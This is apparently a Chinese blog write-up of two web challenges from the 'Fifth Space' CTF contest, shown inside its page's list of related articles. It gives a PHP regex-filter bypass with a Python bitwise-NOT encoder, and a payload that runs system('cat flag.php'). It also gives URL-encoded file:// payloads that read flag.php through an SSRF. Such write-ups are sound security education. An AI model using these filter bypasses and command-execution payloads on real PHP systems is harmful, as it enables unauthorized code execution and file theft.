“第五空间” 智能安全大赛-web部分writeup

最新推荐文章于 2024-06-02 21:39:34 发布
最新推荐文章于 2024-06-02 21:39:34 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: CTF 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45372008/article/details/106970879
版权

前两天和小伙伴打了个比赛,记录下(真菜。。)

“第五空间” 智能安全大赛-web部分wp

  • hate-php

题目限制如下

if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { 
        die('You are too good for me'); 
}

将基本的字符都过滤了,此时想到无字母取反webshell
写个取反脚本

#__coding:utf-8__
def qufan(shell):
	for i in shell:
		hexbit=''.join(hex(~(-(256-ord(i)))))
		print (hexbit.replace('0x','%'),end='')
qufan('system')
print('	')
qufan('cat flag.php')

payload:

?code=(~(%8c%86%8c%8b%9a%92))(~(%9c%9e%8b%df%99%93%9e%98%d1%8f%97%8f))

  • do you konw

审计源码,考察ssrf
重点读两处


if(preg_match("/log|flag|hist|dict|etc|file|write/i" ,$poc)){ 
                die("no hacker"); 
}

在这里插入图片描述
思路:用协议读取flag.php文件
url编码绕过第一处限制且由于第一个变量和第二个变量强类型比较所以它们值完全相等
PS:如果两个变量值不相等,就会判断我们传参的个数,由于传入的参数必定是两个,所以唯一的方法就是让两个变量键值相等;
php类型比较
构造payload

?p=%66%69%6c%65:///var/www/html/%66%6c%61%67.php&q=%66%69%6c%65:///var/www/html/%66%6c%61%67.php

此处要求用file协议去读
在这里插入图片描述

其余题目等师傅们的wp就去复现一波

越今朝!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1
CTFSHOW WEB入门 命令执行 web29-48
sinat_41572027的博客
07-09 1791
CTFSHOW WEB入门 命令执行 web29-48
php异或绕过,CTF中php异或绕过preg_match
weixin_33397740的博客
04-03 2298
0x00:写在前面suctf的题目和强网杯都遇到这种类型题目了,正好就当做一个笔记来记录一下。$hhh= @$_GET['_'];if(!$hhh){highlight_file(__FILE__);}if(strlen($hhh)>18){die('One inch long, one inch strong!');}if ( preg_match('/[\x00- 0-9A-Za-z\'...
BUUCTF web小结 1.0
Sk1y的博客
12-21 612
目录 [ACTF2020 新生赛]Include [极客大挑战 2019]Secret File [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping 方法一:绕过正则表达式 方法二:因为过滤了bash,但是没有过滤sh,可用下面的方法,flag在f12中 方法三:内敛执行绕过,将反引号内命令的输出作为输入执行,flag在f12中 总结 [ACTF2020 新生赛]Include 打开题目:注意一下F12里面的跳转,点击tips,跳转, ur
第五空间writeup-str4nge
wyj_1216 House
08-28 1329
web 空相 进入后: 尝试:id = 1 再次尝试:id = 1 and 1 = 1 尝试读取上面的php文件:25d99be830ad95b02f6f82235c8edcf7.php 发现token 于是: http://111.33.164.4:10001/25d99be830ad95b02f6f82235c8edcf7.php?token=1DJBAAA03PNLD02GJ2S1M...
2021-第五空间智能安全大赛-Web-pklovecloud
qq_53863234的博客
11-29 3272
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct()
2021一带一路暨金砖大赛之企业信息系统安全赛项AWD-writeup(解析)
12-18
1.参赛选手能够根据大赛提供的赛项要求,设计信息安全防护方案, 并且能够提供详细的信息安全防护设备拓扑图。 2.参赛选手能够根据业务需求和实际的工程应用环境,实现网络设 备、安全设备、服务器的连接,通过调试...
2019.4 DDCTF web题--滴 writeup
04-14
DDCTF,2019年4月比赛,web题,第一题--滴 writeup,及flag。
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
ctfshow---php特性
fainpo的博客
04-02 1189
使用此管道符“|”可以将两个命令分隔开,“|”左边命令的输出就会作为“|”右边命令的输入,此命令可连续使用,第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。就是比如get传入a=1第一个foreach的$key就是a,$value就是1,利用die($error) 这里退出会输出$error,所以将flag的值赋值给他就能得到flag,当然第一个if不让,所以我们利用一个跳板。_()==gettext() 是gettext()的拓展函数,开启text扩展。
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
解:第二周TLS_任务(2)
river_mouth_man的博客
03-20 251
[第五空间 2021]EasyCleanup,[强网杯 2019]随便注,[虎符CTF 2022]ezphp,[鹏城杯 2022]简单的php,[RoarCTF 2019]Easy Java,[NPUCTF2020]ezinclude
Steamdeck使用Windows系统游玩雪地奔驰时闪退问题解决方法
fxalll的博客
05-28 426
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问题。困扰我两天的问题终于解决了,也算这个小众游戏全网的第一个解决方案吧。
linux 阿里云服务器安装ImageMagick和php扩展imagick
qq_54039576的博客
05-27 359
我的服务器默认是php.7.4.3 , 改完php -m 是找不到imagick的,实际上没对应php版本解锁,Alibaba Cloud Linux 3.2104 LTS 64位。就所有php.ini全改一遍, 再重启一遍apache和数据库。#寻找所有php.ini文件。
文件包含漏洞
大河之犬的博客
06-02 359
当用户以某种方式控制即将由服务器加载的文件时,就会出现漏洞。远程文件包含(RFI): 从远程服务器加载文件。在php中,默认情况下禁用此功能(本地文件包含(LFI): 服务器加载本地文件PHP 过滤器允许在数据被读取或写入之前执行基本的修改操作。有 5 类过滤器:1、字符串过滤器string.strip_tags: 从数据中删除标签(位于 “” 字符之间的所有内容)2、转换过滤器:转换为不同的编码(iconv -l滥用。
HackTheBox-Machines--Popcorn
七天
05-28 533
Popcorn 测试过程。
深入理解Linux网络总结
最新发布
weixin_45673259的博客
06-02 490
在硬中断的处理中,发起软中断的时候是基于当前CPU核的smp_processor_id的,这意味着哪个核响应的硬中断,那么该硬中断发起的软中断任务就必然由这个核来处理。不过硬中断的上下文里做的工作很少,将传过来的poll_list添加到CPU变量softnet_data的poll_list里(softnet_data中的poll_list是一个双向列表,其中的设备都带有输入帧等着被处理),接着触发软中断NET_RX_SOFTIRQ。服务端响应的第一次握手的时候,会进行半连接队列和全连接队列满的判断。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值